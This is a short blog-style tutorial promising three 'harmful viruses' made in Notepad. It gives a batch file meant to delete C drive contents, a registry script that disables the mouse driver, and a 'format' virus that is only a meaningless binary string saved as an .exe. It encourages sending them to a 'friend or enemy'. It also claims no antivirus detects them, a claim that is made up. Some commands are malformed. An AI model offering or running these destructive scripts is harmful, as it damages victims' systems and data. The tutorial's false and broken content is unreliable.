Make 3 harmfull viruses in less than 1 minutes!
In this post i will teach you to make simple yet very power full or you can say harm full computer virus using a batch file. No software is required to make this virus, Notepad is enough for it. The good thing about this virus it is not detected by any AntiVirus.
1 . Virus That delete all the content of C Drive.
What will this virus do ?
You will create this virus using batch file programming. This virus will delete the C Drive completely. The good thing about this virus is that it is not detected by antivirus.How to Make the virus ?
@Echo off
Del C:\ *.* |y
- Save this file as virus.bat (Name can be anything but .bat is must).
- You have created your virus. Enjoy !!!
2 . Virus That Formate Entire Hard Disk.
What will this virus do ?
You can send this file to your friend or enemy to format their Hard
disk. But please dont try this on your own computer or else you will end
up formatting your own computer.
- Copy the below codes into Notepad.
01001011000111110010010101010101010000011111100000
- Save the file as Format.exe
- You have created your virus. Enjoy !!!
2 . Virus That Disable Your Mouse.
What will this virus do ?
This is a batch virus which is harmfull it will disable your mouse so think before trying it on yourself.
How to Make the virus ?
- Open Notepad and copy below codes
rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------
- Save this file as virus.bat
- Done you just created your virus.